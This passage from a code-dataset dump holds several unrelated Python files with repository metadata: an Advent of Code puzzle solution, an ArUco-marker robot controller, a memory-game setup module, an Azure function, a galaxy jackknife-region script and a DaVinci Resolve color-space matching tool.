1\n if generation2D [i][-1] == '#':\n right_count += 1\n return [top_count,bottom_count,left_count,right_count]\n\ndef innerCount(generation2D):\n top_count = 0\n bottom_count = 0\n right_count = 0\n left_count = 0\n \n if generation2D [1][2] == '#':\n top_count += 1\n if generation2D [3][2] == '#':\n bottom_count += 1\n if generation2D [2][1] == '#':\n left_count += 1\n if generation2D [2][3] == '#':\n right_count += 1\n return [top_count,bottom_count,left_count,right_count]\n\ndef nextGeneration3D(generation3D):\n next = []\n next.append([[\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\".\",\".\"]])\n top_count,bottom_count,left_count,right_count = outerCount(generation3D[0])\n if top_count == 1 or top_count == 2:\n next[0][1][2] = '#'\n if bottom_count == 1 or bottom_count == 2:\n next[0][3][2] = '#'\n if left_count == 1 or left_count == 2:\n next[0][2][1] = '#'\n if right_count == 1 or right_count == 2:\n next[0][2][3] = '#'\n for z in range(len(generation3D)):\n newPlane = []\n if z > 0:\n top_count,bottom_count,left_count,right_count = innerCount(generation3D[z-1])\n else:\n top_count = 0\n bottom_count = 0\n left_count = 0\n right_count = 0\n if z < len(generation3D)-1:\n innertop_count,innerbottom_count,innerleft_count,innerright_count = outerCount(generation3D[z+1])\n else:\n 
innertop_count = 0\n innerbottom_count = 0\n innerleft_count = 0\n innerright_count = 0\n for y in range(len(generation3D[z])):\n newLine = []\n for x in range(len(generation3D[z][0])):\n neighbours = 0\n if y > 0 and generation3D[z][y-1][x] == \"#\":\n neighbours += 1\n if y == 0:\n neighbours += top_count\n if y < len(generation3D[z]) - 1 and generation3D[z][y+1][x] == \"#\":\n neighbours += 1\n if y == 4: \n neighbours += bottom_count\n if x > 0 and generation3D[z][y][x-1] == \"#\":\n neighbours += 1\n if x == 0:\n neighbours += left_count\n if x < len(generation3D[z][0]) - 1 and generation3D[z][y][x+1] == \"#\":\n neighbours += 1\n if x == 4:\n neighbours += right_count\n if y == 1 and x == 2:\n neighbours += innertop_count\n if y == 3 and x == 2:\n neighbours += innerbottom_count\n if y == 2 and x == 1:\n neighbours += innerleft_count\n if y == 2 and x == 3:\n neighbours += innerright_count\n if y == 2 and x == 2:\n neighbours = 10\n\n if generation3D[z][y][x] == \"#\":\n if neighbours == 1:\n newLine.append(\"#\")\n else:\n newLine.append(\".\")\n else:\n if neighbours == 1 or neighbours == 2:\n newLine.append(\"#\")\n else:\n newLine.append(\".\")\n newPlane.append(newLine)\n next.append(newPlane)\n next.append([[\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\".\",\".\"],[\".\",\".\",\".\",\".\",\".\"]])\n innertop_count,innerbottom_count,innerleft_count,innerright_count = innerCount(generation3D[-1])\n if innertop_count == 1:\n for i in range(5):\n next[-1][0][i] = \"#\"\n if innerbottom_count == 1:\n for i in range(5):\n next[-1][-1][i] = \"#\"\n if innerleft_count == 1:\n for i in range(5):\n next[-1][i][0] = \"#\"\n if innerright_count == 1:\n for i in range(5):\n next[-1][i][-1] = \"#\"\n\n return next\n\n\ndef part2(lines):\n # Code the solution to part 2 here, returning the answer as a string\n \n eris = [[]]\n for line in lines:\n newLine = []\n for spot in line:\n newLine.append(spot)\n eris[0].append(newLine)\n for i in range(200):\n eris = nextGeneration3D(eris)\n # print(eris)\n count = 0\n for z in range(len(eris)):\n for y in range(5):\n for x in range(5):\n if eris[z][y][x] == \"#\":\n count += 1\n return f\"After 200 generations there are {count} bugs.\"\n\ndef main ():\n # Opens a dialog to select the input file\n # Times and runs both solutions\n # Prints the results\n fileName = easygui.fileopenbox(default=f\"./\"+AOCDAY+\"/\"+\"*.txt\")\n if fileName == None:\n print(\"ERROR: No file selected.\")\n return\n lines = readFile(fileName)\n p1StartTime = time.perf_counter()\n p1Result = part1(lines)\n p1EndTime = time.perf_counter()\n p2StartTime = time.perf_counter()\n p2Result = part2(lines)\n p2EndTime = time.perf_counter()\n print(\"Advent of Code 2019 Day \" + AOCDAY + \":\")\n print(\" Part 1 Execution Time: \" + str(round((p1EndTime - p1StartTime)*1000,3)) + \" milliseconds\")\n print(\" Part 1 Result: \" + str(p1Result))\n print(\" Part 2 Execution Time: \" + str(round((p2EndTime - p2StartTime)*1000,3)) + \" milliseconds\")\n print(\" Part 2 Result: \" + str(p2Result))\n\nmain()","repo_name":"mils8545/aoc2019py-team","sub_path":"24/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"11932236704","text":"import argparse\nimport math\nimport socket\nimport imutils\nimport time\nimport cv2\nimport sys\n\nimport numpy as np\nfrom scipy.spatial.transform import Rotation\n\nUDP_IP_ADDRESS = \"127.0.0.1\"\nUDP_PORT_WRITE = 5555\n\ncap = cv2.VideoCapture(\"http://localhost:8080\")\n\ndef int_r(num):\n num = int(num + (0.5 if num > 0 else -0.5))\n return num\n\ndef setup():\n\n clientSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n return clientSock\n\n\ndef send(clientSock,linear,angular):\n v = str(round(float(linear)))\n w = str(round(float(angular)))\n\n msg_str = v + ' ' + w\n\n clientSock.sendto(msg_str.encode('utf-8'), (UDP_IP_ADDRESS, UDP_PORT_WRITE))\n\n\ndef get_velocity(x,y):\n\n theta = 0.0\n if x < 0 and y < 0:\n theta = math.atan(y / x) - math.pi\n elif x < 0:\n theta = math.atan(y / x) + math.pi\n else:\n theta = math.atan(y/x)\n\n\n k_v = 1\n k_h = 4.5\n distance = math.sqrt(x ** 2 + y**2)\n linear_velocity = k_v * math.sqrt(x ** 2 + y**2)\n # * (10+1.25/distance)\n angular_velocity = k_h * theta\n print(distance)\n return linear_velocity,angular_velocity\n\ndef get_distance(x,y):\n return math.sqrt(x ** 2 + y**2)\n\n\ndef draw_borders(markerCorner,markerID,rvec,tvec):\n # loop over the detected ArUCo corners\n\n # extract the marker corners (which are always returned\n # in top-left, top-right, bottom-right, and bottom-left\n # order)\n\n corners = markerCorner.reshape((4, 2))\n (topLeft, topRight, bottomRight, bottomLeft) = corners\n # convert each of the (x, y)-coordinate pairs to integers\n topRight = (int(topRight[0]), int(topRight[1]))\n bottomRight = (int(bottomRight[0]), int(bottomRight[1]))\n bottomLeft = (int(bottomLeft[0]), int(bottomLeft[1]))\n topLeft = (int(topLeft[0]), int(topLeft[1]))\n\n # draw the bounding box of the ArUCo detection\n if markerID == 0:\n cv2.line(frame, topLeft, topRight, (0, 255, 0), 2)\n cv2.line(frame, topRight, bottomRight, (0, 255, 0), 2)\n cv2.line(frame, bottomRight, bottomLeft, (0, 255, 0), 2)\n cv2.line(frame, bottomLeft, topLeft, (0, 255, 0), 2)\n # compute and draw the center (x, y)-coordinates of the\n else:\n cv2.line(frame, topLeft, topRight, (0, 255, 0), 2)\n cv2.line(frame, topRight, bottomRight, (0, 255, 0), 2)\n cv2.line(frame, bottomRight, bottomLeft, (0, 255, 0), 2)\n cv2.line(frame, bottomLeft, topLeft, (0, 255, 0), 2)\n # ArUco marker\n cX = int((topLeft[0] + bottomRight[0]) / 2.0)\n cY = int((topLeft[1] + bottomRight[1]) / 2.0)\n cv2.circle(frame, (cX, cY), 4, (0, 0, 255), -1)\n\n cv2.circle(frame, (960, 540), 4, (0, 0, 255), -1)\n\n # draw the ArUco marker ID on the frame\n # cv2.putText(frame, str(markerID),\n # (topLeft[0], topLeft[1] - 15),\n # cv2.FONT_HERSHEY_SIMPLEX,\n # 0.5, (0, 255, 0), 2)\n\n # cv2.putText(frame, f\"{newpose_x} {newpose_y}\",\n # (topLeft[0] - 30, topLeft[1] - 15),\n # cv2.FONT_HERSHEY_SIMPLEX,\n # 0.5, (255, 255, 255), 2)\n # for i,rvec in enumerate(rvecs):\n\n # tvec = tvecs[i]\n cv2.aruco.drawAxis(frame, cameraMatrix, distCoeffs, rvec, tvec, 0.1)\n\n\nis_first_frame = True\n\nif __name__ == \"__main__\":\n\n arucoDict = cv2.aruco.Dictionary_get(cv2.aruco.DICT_4X4_50)\n arucoParams = cv2.aruco.DetectorParameters_create()\n # initialize the video stream and allow the camera sensor to warm up\n print(\"[INFO] starting video stream...\")\n\n cameraMatrix = np.array([[1.53692614e+03, 0.00000000e+00, 9.60766918e+02],\n [0.00000000e+00, 1.53697638e+03, 5.38382719e+02],\n [0.00000000e+00, 0.00000000e+00, 1.00000000e+00]])\n distCoeffs = 
np.array([[2.24131975e-03, 1.48727621e-02, -1.91783238e-04, 1.60971006e-05,\n                           4.84568385e-03]])\n    markerLength=0.35\n\n    prev_frame = 0\n    current_frame = prev_frame\n\n    counter = 0\n\n    clientSock = setup()\n\n    prev_theta = 0\n    prev_distance = 0\n\n    is_robot_present = False\n\n    while True:\n\n\n        # grab the frame from the threaded video stream and resize it\n        # to have a maximum width of 1000 pixels\n        # frame = imutils.resize(frame, width=1000)\n        # detect ArUco markers in the input frame\n        ret, frame = cap.read()\n        (corners, ids, rejected) = cv2.aruco.detectMarkers(frame,\n                                                           arucoDict, parameters=arucoParams)\n        rvecs, tvecs, _objPoints = cv2.aruco.estimatePoseSingleMarkers(corners, markerLength, cameraMatrix, distCoeffs)\n\n\n        f = open('speed_py.txt', 'a')\n        fx = open ('x_py.txt', 'a')\n        fy = open('y_py.txt', 'a')\n\n        if len(corners) > 0:\n            # flatten the ArUco IDs list\n            ids = ids.flatten()\n\n            try:\n                robot_index = list(ids).index(0)\n            except ValueError:\n                print(\"robot not found\")\n                robot_index = 0\n\n            rmat, _ = cv2.Rodrigues(rvecs[robot_index][0])\n\n            translation = [tvecs[robot_index][0][0], tvecs[robot_index][0][1], 0]\n            robot_rotation = rvecs[robot_index][0]\n\n            r_robot = Rotation.from_rotvec(robot_rotation)\n            angles_robot = r_robot.as_euler('zxy')\n            phi_est_robot = np.pi + angles_robot[0] - 0.01\n\n            if robot_index == 1:\n\n                cube_rvec = rvecs[0][0]\n                cube_tvec = tvecs[0][0]\n\n                cube_x_est = cube_tvec[0]\n                cube_y_est = cube_tvec[1]\n\n                newpose_x, newpose_y, _ = rmat @ (np.array([cube_x_est, cube_y_est, 0]) - translation)\n\n                r_cube = Rotation.from_rotvec(cube_rvec)\n                angles_cube = r_cube.as_euler('zxy')\n                phi_est_cube = np.pi + angles_cube[0] - 0.01\n\n                v,w = get_velocity(newpose_x,newpose_y)\n                # w = 4.0 * (phi_est_cube - phi_est_robot)*180/np.pi\n                # print(\"Theta_global: \", (phi_est_cube - phi_est_robot)*180/np.pi)\n\n                # here and below: compute w as the difference of the angles obtained from rvecs\n                # print(np.linalg.norm(np.array([[newpose_x, newpose_y]])))\n                send(clientSock,v,w)\n\n                # prev_theta = theta\n                # prev_distance = distance\n\n\n\n            elif robot_index == 0 and len(ids) != 1:\n\n                cube_rvec = rvecs[1][0]\n                cube_tvec = tvecs[1][0]\n\n                cube_x_est = cube_tvec[0]\n                cube_y_est = cube_tvec[1]\n\n                r_cube = Rotation.from_rotvec(cube_rvec)\n                angles_cube = r_cube.as_euler('zxy')\n                phi_est_cube = np.pi + angles_cube[0] - 0.01\n                newpose_x, newpose_y, _ = rmat @ (np.array([cube_x_est, cube_y_est, 0]) - translation)\n\n                v, w = get_velocity(newpose_x, newpose_y)\n                # w = 4.0 * (phi_est_cube - phi_est_robot)*180/np.pi\n                # print(\"Theta_global: \", (phi_est_cube - phi_est_robot)*180/np.pi)\n\n                # print(np.linalg.norm(np.array([[newpose_x, newpose_y]])))\n                send(clientSock, v, w)\n\n                # prev_theta = theta\n                # prev_distance = distance\n\n\n            else:\n                cube_rvec = rvecs[0][0]\n                cube_tvec = tvecs[0][0]\n\n                cube_x_est = cube_tvec[0]\n                cube_y_est = cube_tvec[1]\n\n                newpose_x, newpose_y, _ = rmat @ (np.array([cube_x_est, cube_y_est, 0]) - translation)\n\n                # print(np.linalg.norm(np.array([[newpose_x, newpose_y]])))\n                # send(clientSock,prev_distance,prev_theta)\n\n\n\n\n            # if not is_first_frame and (frame != prev_frame).any():\n            #\n            #\n            #\n            #     distance = np.linalg.norm(np.array([[translation[0]], [translation[1]]]) - robot_location_prev)\n            #     v = distance * 10 / 0.03\n            #     angle = np.linalg.norm(robot_rotation) - np.linalg.norm(robot_rotation_prev)\n            #     w = angle / 0.03\n            #     counter += 1\n            #     fx.write(f\"{translation[0]*10}\" + '\\n')\n            #     fy.write(f\"{translation[1]*10}\" + '\\n')\n\n\n\n            # print (v)\n            # print (w)\n\n\n\n\n            aruco_numbers = [i for i in range(len(ids))]\n\n            for (corner,markerID,aruco_number) in zip(corners,ids,aruco_numbers):\n\n                rvec = rvecs[aruco_number][0]\n                tvec = tvecs[aruco_number][0]\n\n                draw_borders(corner,markerID,rvec,tvec)\n\n            # show the output frame\n            cv2.imshow(\"Frame\", frame)\n\n\n\n            # do a bit of cleanup\n\n        else:\n            cv2.imshow(\"Frame\", frame)\n\n\n        if not is_first_frame:\n            prev_frame = frame\n\n\n        # robot_rotation_prev = robot_rotation\n        # robot_location_prev = np.array([[translation[0]], [translation[1]]])\n\n        key = cv2.waitKey(1) & 0xFF\n        # if the Esc key was pressed, break from the loop\n        if key == 27:\n            break\n\n        is_first_frame = False\n\n\n\n    cv2.destroyAllWindows()\n    f.close()","repo_name":"AnJoie/MultipurposeRobots","sub_path":"Scripts/VideoCapt.py","file_name":"VideoCapt.py","file_ext":"py","file_size_in_byte":9380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"33493899354","text":"import time \nimport random\nfrom interfaz import interfaz_jugadores\n\n\ndef configurar_juego ():\n \"\"\"\n Luciano Federico Aguilera y Jose Cerda : La función define las variables para las opciones de juego.\n Utiliza dos funciones definidas en este archivo\n \"\"\"\n valido = False\n while not valido :\n try :\n fichas= int(input(\"\\033[0;32m\"+\"\\nCon cuantos pares de fichas desea jugar : \"+\"\\033[0;m\"))\n if 24 > fichas >=2 :\n valido = True\n else:\n print (\"El valor ingresado es invalido , por favor ingrese otro\")\n except :\n print (\"El valor ingresado es invalido , por favor ingrese otro\")\n tablero = tablero_nuevo(fichas)\n #configurar_juego= []\n \n jugadores = {}\n jugadores = agregar_jugadores(jugadores)\n \n #Se inicia el tiempo.\n tiempo_inicio = time.time()\n \n return tiempo_inicio , tablero , jugadores\n\n\ndef agregar_jugadores (jugadores):\n \"\"\"\n Luciano Federico Aguilera: La función define un diccionarrio en base a la cantidad de jugadores y asigna sus nombres como clave.\n \"\"\"\n nom_jugadores = interfaz_jugadores()\n numero = len(nom_jugadores)\n \n for i in range(0,numero):\n color = random.randrange(31,37)\n jugador = nom_jugadores[i]\n jugadores[jugador] = {\"puntos\":0,\"turnos\":0,\"color\":color}\n\n\n return jugadores\n\n\ndef tablero_nuevo(numero_pares):\n \"\"\"\n Luciano Federico Aguilera: La función crea la lista tablero en base a un parametro entero\n \"\"\"\n tablero = []\n #Variable para controlar pares únicos\n letras_usadas = \"\"\n while len(tablero) < numero_pares*2:\n #Se obtiene un numero aleatorio a traves de la función randrange\n letra_may = random.randrange(65 , 90 , step= 1)\n #(Por código ASCII el intervalo [65,90] corresponde a letras mayúsculas)\n #Convertimos el valor a letra\n ficha = chr(letra_may)\n if ficha not in letras_usadas :\n letras_usadas += ficha\n tablero.append([ficha,0])\n tablero.append([ficha+\"b\",0])\n #Shuffle \"mezcla\" las letras en el tablero\n random.shuffle(tablero)\n #print(tablero)\n return tablero","repo_name":"lfaguilera/aprobado","sub_path":"configuraciones.py","file_name":"configuraciones.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"74988696866","text":"# This function is not intended to be invoked directly. Instead it will be\n# triggered by an orchestrator function.\n# Before running this sample, please:\n# - create a Durable orchestration function\n# - create a Durable HTTP starter function\n# - add azure-functions-durable to requirements.txt\n# - run pip install -r requirements.txt\n\nimport logging,json,sys\nfrom . import logic_processor\n\ndef main(name: str) -> str:\n data = json.loads(name)\n custom_result = data['custom_result']\n ismultiple = data['ismultiple']\n try:\n business_logic_flow = json.loads(data['business_logic_flow'])\n components = data['componenttypes']\n logging.info(f\"custom_fields : {custom_result}\")\n if len(components.keys()) == 1 and 'field' in components.keys():\n custom_result = custom_result\n else:\n custom_result = logic_processor.process_logic(business_logic_flow,components,custom_result,ismultiple)\n logging.info(f\"business logic result {custom_result}\")\n return json.dumps({\"message\":\"success\",\"custom_result\":custom_result})\n except Exception as e:\n exception_type, exception_object, exception_traceback = sys.exc_info()\n line_number = exception_traceback.tb_lineno\n logging.info(f\"Exception in Business Logic {e} - {line_number}\")\n return json.dumps({\"message\":f\"exception in business logic, reason: {e}\",\"custom_result\":custom_result})","repo_name":"Kynsai007/AzureFunction","sub_path":"Business-Logic-Activity/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"70748204068","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[8]:\n\n\nimport numpy as np\nfrom astropy.io import fits as pyfits\nfrom tqdm import tqdm\nimport pandas\n\n'''\nGet the jackknife region for each galaxy by reading the jackknife regions file\n'''\ndef getregions(regfile,ra,dec):\n ra = (ra+90.)%360.0\n jackreg = np.zeros(ra.size, dtype=int)\n # Read the file\n listramin,listramax,listdecmin,listdecmax=np.loadtxt(regfile,unpack=1);\n for i in tqdm(range(ra.size)):\n for j in range(listramin.size):\n if(ra[i]=listramax[j]):\n continue;\n if(dec[i]=listdecmax[j]):\n continue;\n jackreg[i]=j;\n break;\n return jackreg\n\nif __name__ == \"__main__\":\n # Now let us get all the jackknife regions\n regfile = \"DES-regions.list\"\n\n hdulist = pyfits.open(\"y3a2_gold2.2.1_redmagic_highdens.fits\")\n data = hdulist[1].data\n ra = data[\"ra\"]\n dec = data[\"dec\"]\n\n jackreg = getregions(regfile, ra, dec)\n d = {}\n d[\"jack_idx\"] = jackreg\n pandas.DataFrame(data=d).to_csv(\"Jackknife.dat\")\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"msssivadas10/icts-p7-code","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"31760170212","text":"#!/usr/bin/env python\n\"\"\"For DaVinci Resolve Space Match\"\"\"\n__author__ = \"Michael\"\n__version__ = \"0.5.0\"\n__license__ = \"MIT\"\n\nimport logging\nimport os\nimport re\n\nfrom get_resolve import get_bmd\n\nmetadata_parser = __import__(\"Metadata Parser\")\n\ngui_mode = 1\n\n\nclass ColorSpaceMatchRule:\n def __init__(self, manufacturer, gamma_notes, color_space_notes, input_color_space):\n self.manufacturer = manufacturer\n self.gamma_notes = gamma_notes\n self.color_space_notes = color_space_notes\n self.input_color_space = input_color_space\n\n\n# create logger\nlogger = logging.getLogger(\"RCM_Color_Space_Match\")\nlogger.setLevel(logging.DEBUG)\n\n# create console handler and set level to debug\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\n\n# create formatter\nformatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\n\n# add formatter to ch\nch.setFormatter(formatter)\n\n# add ch to logger\nlogger.addHandler(ch)\n\ncolor_space_match_list = [ColorSpaceMatchRule(\"Atomos\", \"CLog\", \"Cinema\", \"Canon Cinema Gamut/Canon Log\"),\n ColorSpaceMatchRule(\"Atomos\", \"CLog2\", \"Cinema\", \"Canon Cinema Gamut/Canon Log2\"),\n ColorSpaceMatchRule(\"Atomos\", \"CLog3\", \"Cinema\", \"Canon Cinema Gamut/Canon Log3\"),\n ColorSpaceMatchRule(\"Atomos\", \"F-Log\", \"F-Gamut\", \"FujiFilm F-Log\"),\n ColorSpaceMatchRule(\"Atomos\", \"V-Log\", \"V-Gamut\", \"Panasonic V-Gamut/V-Log\"),\n ColorSpaceMatchRule(\"Atomos\", \"SLog3\", \"SGamut3\", \"S-Gamut3/S-Log3\"),\n ColorSpaceMatchRule(\"Atomos\", \"SLog3\", \"SGamut3Cine\", \"S-Gamut3.Cine/S-Log3\"),\n ColorSpaceMatchRule(\"Atomos\", \"N-Log\", \"BT.2020\", \"Nikon N-Log\"),\n ColorSpaceMatchRule(\"Atomos\", \"HLG\", \"BT.2020\", \"Rec.2100 HLG\"),\n\n ColorSpaceMatchRule(\"Fujifilm\", \"F-log\", \"\", \"FujiFilm F-Log\"),\n\n ColorSpaceMatchRule(\"Panasonic\", \"V-Log\", \"V-Gamut\", \"Panasonic V-Gamut/V-Log\"),\n\n ColorSpaceMatchRule(\"Sony\", \"s-log2\", \"s-gamut\", \"S-Gamut/S-Log2\"),\n ColorSpaceMatchRule(\"Sony\", \"s-log3-cine\", \"s-gamut3-cine\", \"S-Gamut3.Cine/S-Log3\"),\n ColorSpaceMatchRule(\"Sony\", \"s-log3\", \"s-gamut3\", \"S-Gamut3/S-Log3\"),\n ]\ncolor_space_match_map = {}\nfor item in color_space_match_list:\n color_space_match_map[(item.gamma_notes, item.color_space_notes)] = item.input_color_space\n\nmatch_rules = {\"rules\": []}\nmanufacturers = []\nfor item in color_space_match_list:\n if item.manufacturer in manufacturers:\n index = manufacturers.index(item.manufacturer)\n match_rules[\"rules\"][index][\"details\"].append(\n {\"Gamma Notes\": item.gamma_notes, \"Color Space Notes\": item.color_space_notes,\n \"Input Color Space\": item.input_color_space})\n else:\n manufacturers.append(item.manufacturer)\n match_rules[\"rules\"].append({\"manufacturer\": item.manufacturer, \"details\": [\n {\"Gamma Notes\": item.gamma_notes, \"Color Space Notes\": item.color_space_notes,\n \"Input Color Space\": item.input_color_space}]})\n\n\ndef main_window():\n # some element IDs\n win_id = \"com.xiaoli.RCMColorSpaceMatch\" # should be unique for single instancing\n tree_id = \"MatchTree\"\n gamma_notes = \"Gamma Notes\"\n color_space_notes = \"Color Space Notes\"\n input_color_space = \"Input Color Space\"\n\n # check for existing instance\n win = ui.FindWindow(win_id)\n if win:\n win.Show()\n win.Raise()\n exit()\n\n # define the window UI layout\n win = dispatcher.AddWindow({\n 'ID': win_id,\n 'WindowTitle': \"RCM Color Space Match\",\n },\n 
ui.VGroup([\n # color space match rule\n ui.Tree({\"ID\": tree_id}),\n\n ui.VGap(2),\n\n ui.HGroup({\"Weight\": 0}, [\n ui.CheckBox(\n {\"ID\": \"EnableMetadataParser\", \"Text\": \"Enable Metadata Parser\", \"Weight\": 0, \"Checked\": True}),\n ui.CheckBox(\n {\"ID\": \"EnableDataLevelAdjustment\", \"Text\": \"Enable Assign Atomos Clips' Data Level\", \"Weight\": 0}),\n ui.ComboBox({\"ID\": \"DataLevelAdjustmentType\", \"Weight\": 1})\n ]),\n\n ui.VGap(2),\n\n ui.HGroup({\"Weight\": 0}, [\n ui.Button({\"Text\": \"Match\", \"ID\": \"ExecuteButton\", \"Weight\": 0}),\n ui.HGap(5),\n ui.Label({'Font': ui.Font({'Family': \"Times New Roman\"}), \"ID\": \"InfoLabel\"})\n ]),\n ])\n )\n win.Resize([700, 480])\n win.RecalcLayout()\n\n def init_tree():\n items = win.GetItems()\n\n # Add a header row.\n hdr = items[tree_id].NewItem()\n hdr[\"Text\"][0] = gamma_notes\n hdr[\"Text\"][1] = color_space_notes\n hdr[\"Text\"][2] = input_color_space\n items[tree_id].SetHeaderItem(hdr)\n\n # Number of columns in the Tree list\n items[tree_id][\"ColumnCount\"] = 3\n\n # Resize the Columns\n items[tree_id][\"ColumnWidth\"][0] = 200\n items[tree_id][\"ColumnWidth\"][1] = 200\n items[tree_id][\"ColumnWidth\"][2] = 260\n\n def init_combo():\n items = win.GetItems()\n\n items[\"DataLevelAdjustmentType\"].AddItem('For Log and Legal Clips')\n items[\"DataLevelAdjustmentType\"].AddItem('For All Clips')\n\n def show_message(message, t=0):\n if t == 0:\n win.GetItems()[\"InfoLabel\"][\"Text\"] = f\"{message} \"\n elif t == 1:\n win.GetItems()[\"InfoLabel\"][\"Text\"] = f\"{message} \"\n\n def load_color_space_match_rule():\n for manufacturerRule in match_rules[\"rules\"]:\n items = win.GetItems()\n item = items[tree_id].NewItem()\n item[\"Text\"][0] = manufacturerRule[\"manufacturer\"]\n items[tree_id].AddTopLevelItem(item)\n for rule in manufacturerRule[\"details\"]:\n item_child = items[tree_id].NewItem()\n item_child[\"Text\"][0] = rule[gamma_notes]\n item_child[\"Text\"][1] = rule[color_space_notes]\n item_child[\"Text\"][2] = rule[input_color_space]\n item.AddChild(item_child)\n item[\"Expanded\"] = True\n\n def click_execute_button(ev):\n logger.info(\"Start Processing.\")\n show_message(\"Processing...\")\n items = win.GetItems()\n if execute(assign_data_level_enabled=items[\"EnableDataLevelAdjustment\"][\"Checked\"],\n assign_type=items[\"DataLevelAdjustmentType\"][\"CurrentIndex\"],\n parse_metadata_enabled=items[\"EnableMetadataParser\"][\"Checked\"]):\n show_message(\"All Down. 
Have Fun!\")\n else:\n show_message(\"Some process failed, please check console log details.\", 1)\n\n def close(ev):\n dispatcher.ExitLoop()\n\n init_tree()\n init_combo()\n load_color_space_match_rule()\n\n # assign event handlers\n win.On[win_id].Close = close\n win.On[\"ExecuteButton\"].Clicked = click_execute_button\n win.Show()\n dispatcher.RunLoop()\n win.Hide()\n\n\ndef get_clips(folder, result):\n result.extend(folder.GetClipList())\n sub_folders = folder.GetSubFolders()\n for sub_folder in sub_folders.values():\n get_clips(sub_folder, result)\n\n\ndef assign_data_level(clip, metadata, assign_type):\n if metadata.get(\"Camera Manufacturer\") == \"Atomos\":\n gamma_notes = metadata.get(\"Gamma Notes\") if metadata.get(\"Gamma Notes\") else \"\"\n camera_notes = metadata.get(\"Camera Notes\") if metadata.get(\"Camera Notes\") else \"\"\n if assign_type == 0 and (\n re.search(\"LOG\", gamma_notes, re.IGNORECASE) or \"Range: Legal\" in camera_notes) or assign_type == 1:\n if clip.SetClipProperty(\"Data Level\", \"Full\"):\n logger.debug(f\"Assign {clip.GetName()} data level full successfully.\")\n else:\n logger.error(f\"Assign {clip.GetName()} data level full failed.\")\n return False\n return True\n\n\ndef parse_metadata(clip, lib):\n file_path = clip.GetClipProperty(\"File Path\")\n if len(file_path) > 0:\n resolve_meta_dict = lib.DRProcessMediaFile(file_path.encode(\"utf-8\")).get_dict()\n if resolve_meta_dict:\n if not resolve_meta_dict[\"IsSupportMedia\"]:\n logger.warning(f\"{os.path.basename(file_path)} Not Supported.\")\n else:\n del resolve_meta_dict[\"IsSupportMedia\"]\n meta = {k: v.decode(\"utf-8\") for k, v in resolve_meta_dict.items() if v}\n if not meta:\n logger.debug(f\"Ignore clip {os.path.basename(file_path)}.\")\n else:\n if clip.SetMetadata(meta):\n logger.debug(f\"Process {os.path.basename(file_path)} Successfully.\")\n return meta\n else:\n logger.error(f\"Failed to set {os.path.basename(file_path)} metadata!\")\n else:\n logger.error(f\"Failed to parse clip {clip.GetName()}\")\n return None\n\n\ndef execute(assign_data_level_enabled=True, assign_type=0, parse_metadata_enabled=True):\n logger.info(\"Start match input color space and apply custom grading rules.\")\n resolve = bmd.scriptapp(\"Resolve\")\n project_manager = resolve.GetProjectManager()\n project = project_manager.GetCurrentProject()\n media_pool = project.GetMediaPool()\n root_folder = media_pool.GetRootFolder()\n success = True\n is_rcm = \"davinciYRGBColorManaged\" in project.GetSetting(\"colorScienceMode\")\n clips = []\n\n get_clips(root_folder, clips)\n lib = {}\n if parse_metadata_enabled:\n lib = metadata_parser.get_cdll_lib()\n for clip in clips:\n metadata = parse_metadata(clip, lib) if parse_metadata_enabled else clip.GetMetadata()\n codec = clip.GetClipProperty('Video Codec')\n if not metadata or 'RED' == codec.upper() or 'RAW' in codec.upper():\n continue\n if is_rcm:\n gamma_notes = metadata.get(\"Gamma Notes\") if metadata.get(\"Gamma Notes\") else \"\"\n color_space_rotes = metadata.get(\"Color Space Notes\") if metadata.get(\"Color Space Notes\") else \"\"\n input_color_space = color_space_match_map.get((gamma_notes, color_space_rotes))\n if input_color_space:\n if clip.GetClipProperty(\"Input Color Space\") == input_color_space:\n logger.debug(f\"Already Set {clip.GetName()} Input Color Space\")\n continue\n if clip.SetClipProperty(\"Input Color Space\", input_color_space):\n logger.debug(f\"{clip.GetName()} Set Input Color Space {input_color_space} Successfully.\")\n else:\n 
success = False\n logger.error(f\"{clip.GetName()} Set Input Color Space {input_color_space} Failed!\")\n else:\n logger.warning(f\"{clip.GetName()}: No Input Color Space Match Rule Found!\")\n if assign_data_level_enabled:\n if not assign_data_level(clip, metadata, assign_type):\n success = False\n if success:\n logger.info(\"All Done, Have Fun!\")\n return True\n else:\n logger.warning(\"Some error happened, please check console details.\")\n return False\n\n\nif __name__ == '__main__':\n bmd = get_bmd()\n if \"gui_mode\" in locals().keys() and gui_mode:\n fusion = bmd.scriptapp(\"Fusion\")\n ui = fusion.UIManager\n dispatcher = bmd.UIDispatcher(ui)\n main_window()\n else:\n execute()\n","repo_name":"fukco/DaVinciResolveScript","sub_path":"Deprecated/Fusion/Scripts/Utility/RCM Color Space Match.py","file_name":"RCM Color Space Match.py","file_ext":"py","file_size_in_byte":11697,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"70"}
